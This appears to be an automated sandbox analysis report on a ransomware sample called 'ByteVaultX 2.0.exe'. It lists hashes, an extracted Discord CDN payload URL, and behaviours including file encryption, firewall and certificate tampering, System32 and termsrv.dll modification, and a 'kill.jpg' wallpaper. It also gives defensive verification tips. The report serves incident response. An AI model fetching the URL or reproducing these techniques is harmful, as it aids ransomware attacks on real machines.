Resubmissions
25-05-2024 23:51
240525-3wjp3afg59 10
Analysis
max time kernel
644s
max time network
768s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags
arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted
25-05-2024 23:51
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win11-20240426-en
General
Target
ByteVaultX 2.0.exe
Size
9.9MB
MD5
26001ddd86377ac2ec3fcedb8d6f36b9
SHA1
cf4d832df5227ede476c0794cf871a4bcecb4d36
SHA256
a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c
SHA512
a09fe56683b4a42ce02b0e1e28557223bf0e925212e9f6541a805b914e08ab06843821d8e991fa0d3709e4e41b55db4c7b95496a29958665d10ab177b5a62277
SSDEEP
196608:9h5kRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:aGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&
Extracted
C:\Encrypt\encrypt.html
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: OfficeC2RClient.exe
  description: Parent C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE is not expected to spawn this process
  pid: 1208
  pid_target: 4640
  process: OfficeC2RClient.exe
  target process: EXCEL.EXE
Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
Blocklisted process makes network request 14 IoCs
Processes: powershell.exe (14 instances)
  flow  pid   process
  3     4624  powershell.exe
  5     428   powershell.exe
  14    4132  powershell.exe
  15    1308  powershell.exe
  16    4964  powershell.exe
  21    4584  powershell.exe
  37    1468  powershell.exe
  38    4408  powershell.exe
  42    5032  powershell.exe
  43    1832  powershell.exe
  44    1300  powershell.exe
  52    808   powershell.exe
  53    4712  powershell.exe
  54    1588  powershell.exe
Disables Task Manager via registry modification
Drops file in Drivers directory 64 IoCs
Processes: cmd.exe
  File opened for modification (cmd.exe):
    C:\Windows\System32\drivers\en-US\processr.sys.mui
    C:\Windows\System32\drivers\afd.sys
    C:\Windows\System32\drivers\VerifierExt.sys
    C:\Windows\System32\drivers\xinputhid.sys
    C:\Windows\System32\drivers\ndisuio.sys
    C:\Windows\System32\drivers\vwifimp.sys
    C:\Windows\System32\drivers\wacompen.sys
    C:\Windows\System32\drivers\dxgmms1.sys
    C:\Windows\System32\drivers\en-US\mssmbios.sys.mui
    C:\Windows\System32\drivers\udfs.sys
    C:\Windows\System32\drivers\USBXHCI.SYS
    C:\Windows\System32\drivers\en-US\amdk8.sys.mui
    C:\Windows\System32\drivers\tbs.sys
    C:\Windows\System32\drivers\Ndu.sys
    C:\Windows\System32\drivers\rmcast.sys
    C:\Windows\System32\drivers\fdc.sys
    C:\Windows\System32\drivers\hyperkbd.sys
    C:\Windows\System32\drivers\swenum.sys
    C:\Windows\System32\drivers\en-US\sdbus.sys.mui
    C:\Windows\System32\drivers\gm.dls
    C:\Windows\System32\drivers\rdyboost.sys
    C:\Windows\Syswow64\drivers\gm.dls
    C:\Windows\System32\drivers\en-US\iorate.sys.mui
    C:\Windows\System32\drivers\en-US\mslldp.sys.mui
    C:\Windows\System32\drivers\en-US\RNDISMP.sys.mui
    C:\Windows\System32\drivers\mouhid.sys
    C:\Windows\System32\drivers\msgpiowin32.sys
    C:\Windows\System32\drivers\umbus.sys
    C:\Windows\System32\drivers\dumpfve.sys
    C:\Windows\System32\drivers\en-US\spbcx.sys.mui
    C:\Windows\System32\drivers\terminpt.sys
    C:\Windows\System32\drivers\tsusbhub.sys
    C:\Windows\System32\drivers\UMDF\en-US\hidscanner.dll.mui
    C:\Windows\System32\drivers\usb8023.sys
    C:\Windows\System32\drivers\wmiacpi.sys
    C:\Windows\System32\drivers\circlass.sys
    C:\Windows\System32\drivers\en-US\dumpsd.sys.mui
    C:\Windows\System32\drivers\wmilib.sys
    C:\Windows\System32\drivers\en-US\dmvsc.sys.mui
    C:\Windows\System32\drivers\en-US\mssecflt.sys.mui
    C:\Windows\System32\drivers\iagpio.sys
    C:\Windows\System32\drivers\UMDF\SensorsCx.dll
    C:\Windows\System32\drivers\en-US\vhdmp.sys.mui
    C:\Windows\System32\drivers\en-US\serial.sys.mui
    C:\Windows\System32\drivers\hidir.sys
    C:\Windows\System32\drivers\stream.sys
    C:\Windows\System32\drivers\buttonconverter.sys
    C:\Windows\System32\drivers\en-US\ucx01000.sys.mui
    C:\Windows\System32\drivers\srv.sys
    C:\Windows\System32\drivers\en-US\netvsc.sys.mui
    C:\Windows\System32\drivers\en-US\http.sys.mui
    C:\Windows\System32\drivers\UMDF\EhStorPwdDrv.dll
    C:\Windows\System32\drivers\ataport.sys
    C:\Windows\System32\drivers\fsdepends.sys
    C:\Windows\System32\drivers\mouclass.sys
    C:\Windows\System32\drivers\UMDF\en-US\idtsec.dll.mui
    C:\Windows\System32\drivers\UMDF\en-US\mgtdyn.dll.mui
    C:\Windows\System32\drivers\dxgkrnl.sys
    C:\Windows\System32\drivers\rasl2tp.sys
    C:\Windows\System32\drivers\scfilter.sys
    C:\Windows\System32\drivers\usbprint.sys
    C:\Windows\System32\drivers\lltdio.sys
    C:\Windows\System32\drivers\gmreadme.txt
    C:\Windows\System32\drivers\rasacd.sys
Manipulates Digital Signatures 1 TTPs 35 IoCs
Attackers can apply techniques such as changing the Authenticode and Cryptography registry keys so that their binary is treated as validly signed.
Processes: regedit.exe, cmd.exe
  Key deleted (regedit.exe):
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\CTLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
  File opened for modification (cmd.exe):
    C:\Windows\System32\wintrust.dll
    C:\Windows\Syswow64\wintrust.dll
Modifies Installed Components in the registry 2 TTPs 8 IoCs
Processes: regedit.exe
  Key deleted (regedit.exe):
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}
Modifies Windows Firewall 2 TTPs 64 IoCs
Processes: netsh.exe (64 instances)
  pids: 2596, 4796, 1232, 676, 2964, 2748, 1300, 2608, 4132, 5108, 640, 2112, 4148, 168, 616, 2700, 4144, 4204, 1108, 1888, 4196, 3948, 4608, 3812, 2452, 4764, 3648, 4916, 2592, 904, 2748, 3428, 4012, 4108, 3316, 4016, 1788, 3340, 3688, 3996, 5024, 2204, 2240, 3928, 3964, 792, 1800, 2292, 4344, 1424, 292, 2320, 2700, 1304, 5104, 428, 2192, 3076, 204, 2192, 4996, 3100, 4608, 2932
Registers new Print Monitor 2 TTPs 10 IoCs
Processes: regedit.exe
  Key deleted (regedit.exe):
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\IppMon
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\OfflinePorts
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port
    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely for geofencing.
Processes: ByteVaultX 2.0.exe
  Key value queried (ByteVaultX 2.0.exe):
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation
Loads dropped DLL 12 IoCs
Processes: ByteVaultX 2.0.exe
  pid 3040 ByteVaultX 2.0.exe (12 loads)
Modifies file permissions 1 TTPs 6 IoCs
Processes: takeown.exe (6 instances)
  pids: 4916, 148, 656, 3428, 588, 2324
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes: regedit.exe
  Key deleted (regedit.exe):
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\lnkfile\shellex\ContextMenuHandlers
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\lnkfile\shellex
Registers COM server for autorun 1 TTPs 64 IoCs
Processes: regedit.exe
  Key deleted (regedit.exe). Every entry is \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{GUID}\InprocServer32 with one of the following GUIDs:
    {CAFEEFAC-0016-0000-0144-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0062-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0076-ABCDEFFEDCBC}
    {CAFEEFAC-0018-0000-0180-ABCDEFFEDCBC}
    {CAFEEFAC-0015-0000-0020-ABCDEFFEDCBC}
    {CAFEEFAC-0017-0000-0235-ABCDEFFEDCBC}
    {CAFEEFAC-0017-0000-0292-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0154-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0160-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0219-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0010-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0070-ABCDEFFEDCBC}
    {CAFEEFAC-0018-0000-0224-ABCDEFFEDCBC}
    {CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}
    {CAFEEFAC-0016-0000-0174-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0025-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0051-ABCDEFFEDCBC}
    {CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}
    {CAFEEFAC-0016-0000-0092-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0230-ABCDEFFEDCBA}
    {CAFEEFAC-0014-0001-0007-ABCDEFFEDCBA}
    {CAFEEFAC-0016-0000-0085-ABCDEFFEDCBA}
    {CAFEEFAC-0016-0000-0195-ABCDEFFEDCBC}
    {CAFEEFAC-0017-0000-0070-ABCDEFFEDCBB}
    {CAFEEFAC-0017-0000-0245-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0091-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0160-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0063-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0367-ABCDEFFEDCBC}
    {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}
    {CAFEEFAC-0013-0001-0088-ABCDEFFEDCBB}
    {CAFEEFAC-0014-0002-0075-ABCDEFFEDCBB}
    {CAFEEFAC-0013-0001-0081-ABCDEFFEDCBB}
    {CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}
    {CAFEEFAC-0017-0000-0251-ABCDEFFEDCBB}
    {CAFEEFAC-0017-0000-0290-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0054-ABCDEFFEDCBA}
    {CAFEEFAC-0016-0000-0091-ABCDEFFEDCBC}
    {CAFEEFAC-0017-0000-0128-ABCDEFFEDCBC}
    {CAFEEFAC-0018-0000-0125-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0377-ABCDEFFEDCBC}
    {CAFEEFAC-0015-0000-0061-ABCDEFFEDCBA}
    {CAFEEFAC-0016-0000-0145-ABCDEFFEDCBC}
    {CAFEEFAC-0016-0000-0175-ABCDEFFEDCBC}
    {CAFEEFAC-0017-0000-0076-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0176-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0300-ABCDEFFEDCBC}
    {CAFEEFAC-0018-0000-0193-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0358-ABCDEFFEDCBC}
    {CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA}
    {CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0271-ABCDEFFEDCBA}
    {CAFEEFAC-0017-0000-0376-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0231-ABCDEFFEDCBC}
    {CAFEEFAC-0018-0000-0250-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0358-ABCDEFFEDCBB}
    {CAFEEFAC-0016-0000-0212-ABCDEFFEDCBB}
    {CAFEEFAC-0017-0000-0079-ABCDEFFEDCBB}
    {CAFEEFAC-0018-0000-0096-ABCDEFFEDCBC}
    {CAFEEFAC-0016-0000-0215-ABCDEFFEDCBB}
    {CAFEEFAC-0017-0000-0042-ABCDEFFEDCBB}
    {CAFEEFAC-0017-0000-0355-ABCDEFFEDCBA}
    {CAFEEFAC-0018-0000-0211-ABCDEFFEDCBC}
    {CAFEEFAC-0017-0000-0183-ABCDEFFEDCBC}
Adds Run key to start application 2 TTPs 1 IoCs
Processes: regedit.exe
  Key deleted (regedit.exe):
    \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run
Drops desktop.ini file(s) 8 IoCs
Processes: ByteVaultX 2.0.exe
  File opened for modification (ByteVaultX 2.0.exe):
    C:\Users\Admin\Music\desktop.ini
    C:\Users\Admin\Videos\desktop.ini
    C:\Users\Admin\Downloads\desktop.ini
    C:\Users\Admin\Documents\desktop.ini
    C:\Users\Admin\Pictures\desktop.ini
    C:\Users\Admin\Pictures\Camera Roll\desktop.ini
    C:\Users\Admin\Pictures\Saved Pictures\desktop.ini
    C:\Users\Admin\Desktop\desktop.ini
Processes: powershell.exe (64 instances)
  pids: 3076, 992, 4584, 2436, 5032, 2596, 428, 3556, 2964, 2948, 3652, 1560, 504, 5032, 4916, 1440, 4712, 4684, 1436, 4408, 2232, 2896, 4112, 968, 3832, 1576, 2240, 1420, 1788, 1936, 792, 1044, 5048, 3208, 4140, 4820, 2792, 292, 4684, 4196, 4708, 1416, 1804, 4232, 2964, 4880, 3996, 3532, 1968, 1564, 2640, 3348, 3472, 3556, 4176, 2964, 2232, 3860, 712, 2940, 4408, 3608, 4740, 4308
Drops file in System32 directory 64 IoCs
Processes:
cmd.exe
description | ioc | process
File opened for modification | C:\Windows\System32\es-ES\rdpcorets.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\ja-jp\Windows.UI.Immersive.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\KBDA1.DLL | cmd.exe
File opened for modification | C:\Windows\Syswow64\it-IT\dmusic.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\uk-UA\TSWorkspace.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\wer.dll | cmd.exe
File opened for modification | C:\Windows\Syswow64\wscadminui.exe | cmd.exe
File opened for modification | C:\Windows\System32\ja-jp\shsvcs.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\DRIVER~1\FILERE~1\ERRDEV~1.INF\errdev.sys | cmd.exe
File opened for modification | C:\Windows\System32\pscript.sep | cmd.exe
File opened for modification | C:\Windows\Syswow64\es-ES\credprovslegacy.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\DRIVER~1\ja-JP\iaLPSS2i_GPIO2_BXT_P.inf_loc | cmd.exe
File opened for modification | C:\Windows\System32\blbres.dll | cmd.exe
File opened for modification | C:\Windows\Syswow64\de-DE\printui.exe.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\de-DE\wlanmm.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\bcdprov.dll | cmd.exe
File opened for modification | C:\Windows\System32\de-DE\devmgr.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\de-DE\NPSMDesktopProvider.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\fr-FR\wldap32.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\Speech\SpeechUX\ja-JP\sapi.cpl.mui | cmd.exe
File opened for modification | C:\Windows\System32\TokenBrokerCookies.exe | cmd.exe
File opened for modification | C:\Windows\Syswow64\it-IT\tcmsetup.exe.mui | cmd.exe
File opened for modification | C:\Windows\System32\de-DE\scrobj.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\MFWMAAEC.DLL | cmd.exe
File opened for modification | C:\Windows\System32\wbem\MDMSettingsProv.mof | cmd.exe
File opened for modification | C:\Windows\Syswow64\Dism\fr-FR\AppxProvider.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\WINDOW~1\v1.0\Modules\NetLbfo\NetLbfo.Types.ps1xml | cmd.exe
File opened for modification | C:\Windows\Syswow64\WINDOW~1\v1.0\Schemas\PSMaml\developerCommand.xsd | cmd.exe
File opened for modification | C:\Windows\System32\mfdvdec.dll | cmd.exe
File opened for modification | C:\Windows\System32\msftedit.dll | cmd.exe
File opened for modification | C:\Windows\Syswow64\sk-SK\comctl32.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\WINDOW~1\v1.0\Modules\PSDESI~1\DSCRES~1\MSFT_P~1\en-US\PackageProvider.psd1 | cmd.exe
File opened for modification | C:\Windows\System32\it-IT\mstsc.exe.mui | cmd.exe
File opened for modification | C:\Windows\System32\joinutil.dll | cmd.exe
File opened for modification | C:\Windows\Syswow64\it-IT\radardt.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\de-DE\SyncSettings.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\es-ES\wmerror.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\fr-FR\efsext.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\it-IT\upnphost.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\Windows.Media.Editing.dll | cmd.exe
File opened for modification | C:\Windows\System32\Windows.UI.Immersive.dll | cmd.exe
File opened for modification | C:\Windows\Syswow64\it-IT\profext.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\de-DE\spp.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\POINTO~1\PROTOC~1\en-US\PrinterProtocolProvider.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\uk-UA\winver.exe.mui | cmd.exe
File opened for modification | C:\Windows\System32\en-US\hotplug.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\it-IT\autoconv.exe.mui | cmd.exe
File opened for modification | C:\Windows\System32\WINDOW~1\v1.0\Modules\PSDESI~1\DSCRES~1\MSFT_S~1\ja-JP\MSFT_ScriptResourceStrings.psd1 | cmd.exe
File opened for modification | C:\Windows\Syswow64\de-DE\tapi3.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\fr-FR\cmdkey.exe.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\zh-CN\fms.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\en-US\msg.exe.mui | cmd.exe
File opened for modification | C:\Windows\System32\WINDOW~1\v1.0\Modules\NETWOR~3\MSFT_NetDnsTransitionMonitoring.format.ps1xml | cmd.exe
File opened for modification | C:\Windows\Syswow64\de-DE\nslookup.exe.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\de-DE\webclnt.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\en-US\wevtapi.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\ja-JP\dsuiext.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\ja-JP\icsigd.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\DRIVER~1\de-DE\wpdmtp.inf_loc | cmd.exe
File opened for modification | C:\Windows\System32\en-US\PhoneUtil.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\fr-FR\sens.dll.mui | cmd.exe
File opened for modification | C:\Windows\System32\SecurityAndMaintenance.png | cmd.exe
File opened for modification | C:\Windows\Syswow64\es-ES\rdvgumd32.dll.mui | cmd.exe
File opened for modification | C:\Windows\Syswow64\Robocopy.exe | cmd.exe
All 64 entries are attributed to cmd.exe and mix executable code (wer.dll, bcdprov.dll, blbres.dll, Robocopy.exe, wscadminui.exe, errdev.sys) with .mui resource libraries, PowerShell module files, a .mof and a PNG, which points to an indiscriminate walk of System32 and SysWOW64 rather than targeted patching. The 8.3 short names (DRIVER~1 for DriverStore, WINDOW~1 for WindowsPowerShell, PSDESI~1 for PSDesiredStateConfiguration) mean these IoCs will not match long-name telemetry verbatim; normalise before searching. "Opened for modification" records the requested access, not that the bytes changed, so confirm on an affected host by hashing the files against a clean build or running sfc /verifyonly.
Modifies termsrv.dll 1 TTPs 1 IoCs
Commonly used to allow simultaneous RDP sessions. Here the write is attributed to cmd.exe, the same image that touches the other 64 System32 files above, so a patched termsrv.dll enabling concurrent RDP logons is one reading and blanket modification of System32 content is another. On an affected host compare the file with a known-good copy, for example sfc /verifyfile=C:\Windows\System32\termsrv.dll, or Get-AuthenticodeSignature C:\Windows\System32\termsrv.dll, where any status other than Valid means the catalog-signed binary no longer matches Microsoft's hash.
Processes:
cmd.exe
description | ioc | process
File opened for modification | C:\Windows\System32\termsrv.dll | cmd.exe
Sets desktop wallpaper using registry 2 TTPs 14 IoCs
Processes:
reg.exe (14 instances)
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" | reg.exe
The identical write is recorded 14 times, once per reg.exe instance: the per-user Wallpaper value under HKCU\Control Panel\Desktop is pointed at kill.jpg on the user's Desktop.
Drops file in Windows directory 5 IoCs
Processes:
MicrosoftEdgeCP.exe, SearchUI.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe
description | ioc | process
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | SearchUI.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdgeCP.exe
All five writers are Windows components (the legacy Edge browser and the search host); the merged .pri files under rescache are the resource cache those apps build when launched, so this signature records the browser being started during the run, not a file dropped by the sample.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | SearchUI.exe
